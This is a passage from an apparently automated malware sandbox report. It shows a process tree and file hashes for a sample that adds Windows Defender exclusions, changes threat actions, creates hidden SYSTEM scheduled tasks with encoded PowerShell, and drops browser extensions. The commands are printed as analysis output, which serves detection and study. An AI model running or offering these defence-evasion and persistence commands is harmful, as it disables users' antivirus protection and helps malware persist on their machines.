                                                                                                                                                                                  PID:392
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:1812
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:428
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:640
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:4608
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:4956
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:1528
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:3560
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:2596
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:3732
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:3500
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:4904
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:1120
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:3152
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:4872
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:3576
                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                              schtasks /CREATE /TN "gcvfXLLnE" /SC once /ST 03:29:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                              PID:1156
                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                              schtasks /run /I /tn "gcvfXLLnE"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:708
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /DELETE /F /TN "gcvfXLLnE"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:688
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /CREATE /TN "yfARWRprRqUFWeTGf" /SC once /ST 05:44:58 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DwTEwQU.exe\" aV /fFFmdidkG 385118 /S" /V1 /F
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                  PID:2108
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /run /I /tn "yfARWRprRqUFWeTGf"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:2340
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                  PID:72
                                                                                                                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:3076
                                                                                                                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:1852
                                                                                                                                                                                                                    • C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DwTEwQU.exe
                                                                                                                                                                                                                      C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DwTEwQU.exe aV /fFFmdidkG 385118 /S
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Drops Chrome extension
                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                      PID:3120
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:3564
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:5092
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:4896
                                                                                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:2320
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:1412
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:1040
                                                                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                            PID:1432
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:1904
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:3760
                                                                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                  PID:236
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:1456
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:5100
                                                                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                        PID:4304
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:1576
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:1424
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                            PID:1136
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                PID:4216
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                        schtasks /DELETE /F /TN "biPxHmULFllsbMgnpt"
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:1132
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:3928
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:536
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:964
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                      PID:2320
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                          PID:2944
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\zgoZGMcaU\cVMkxb.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JHJXtPPPvDXVqpH" /V1 /F
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                  PID:3616
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                  schtasks /CREATE /TN "JHJXtPPPvDXVqpH2" /F /xml "C:\Program Files (x86)\zgoZGMcaU\sHxXtss.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                  PID:1696
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                  schtasks /END /TN "JHJXtPPPvDXVqpH"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:4988
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                    schtasks /DELETE /F /TN "JHJXtPPPvDXVqpH"
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:2036
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                      schtasks /CREATE /TN "HtmGfIeJlxktuW" /F /xml "C:\Program Files (x86)\epoBtGYzqLvU2\XNRuMTo.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                      PID:4532
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                      schtasks /CREATE /TN "beuYBzgGTLbmn2" /F /xml "C:\ProgramData\pICeQFkDCDDquYVB\zPhYTff.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                      PID:2068
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                      schtasks /CREATE /TN "ykYfCTTujiceFdOqI2" /F /xml "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\RApBssO.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                      PID:3104
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                      schtasks /CREATE /TN "fWcEirOkMoMQjrUKaey2" /F /xml "C:\Program Files (x86)\ecOJmsgAHWlsC\QEWoiYI.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                      PID:3188
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                      schtasks /CREATE /TN "aNyMQclguOCSCcjxm" /SC once /ST 03:07:37 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\nlcUipsDcFbdntMB\puIASlSx\pEzZhcV.dll\",#1 /KoxdidtlV 385118" /V1 /F
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                      PID:3244
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                      schtasks /run /I /tn "aNyMQclguOCSCcjxm"
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:224
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                        schtasks /DELETE /F /TN "yfARWRprRqUFWeTGf"
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:2036
                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:3456
                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\nlcUipsDcFbdntMB\puIASlSx\pEzZhcV.dll",#1 /KoxdidtlV 385118
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:1456
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\nlcUipsDcFbdntMB\puIASlSx\pEzZhcV.dll",#1 /KoxdidtlV 385118
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                                                                              PID:5008
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                schtasks /DELETE /F /TN "aNyMQclguOCSCcjxm"
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:3152

                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              2.0MB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              e244f6a12f1bcc4badc59f3c0f96166c

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              5c7726ba8ef47bf7e2373547ca5be289349ab61b

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              5eef4a9fede86cad9428041d56c662f5dcdb23c4c7c0a27bf4e873d97959f898

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              d2a768bc12788304c8c8356533dee75e2ced7510bae65a391ae966b9d1dcda1008a5d1721e6bef6323294a8b05bc0e1ecd3b0998a3ec449921dc134424dc292a

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              187B

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              136B

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              150B

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              11KB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              4702c2e74e4786c04702c3958bb90b66

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              4e13129bd5c49e21a5048621a63f92017e804ea7

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              e2120708ea93437a4b258e5e0416141efc61edd3a1dd2a2ebf09381f727a348a

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              cc71a86531fbe98fcba8fbfe8e9505a34e0a31d48e7aa49b2526083645743c74ae8f889f7feeb3ff36a18953231063f6e6d42bc4017224b2bea659b18369fc7e

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              36KB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              a8883ada096f024573f999768dc65577

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              ea2e925b3d105b5c242f0ecdc05e7cf9b30f074c

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              78e97012ea5aee4ce80af0cb180f2b80e65a3bd278a8a51f0561070fae5eb328

                                                                                                                                                                                                                                                                              SHA512

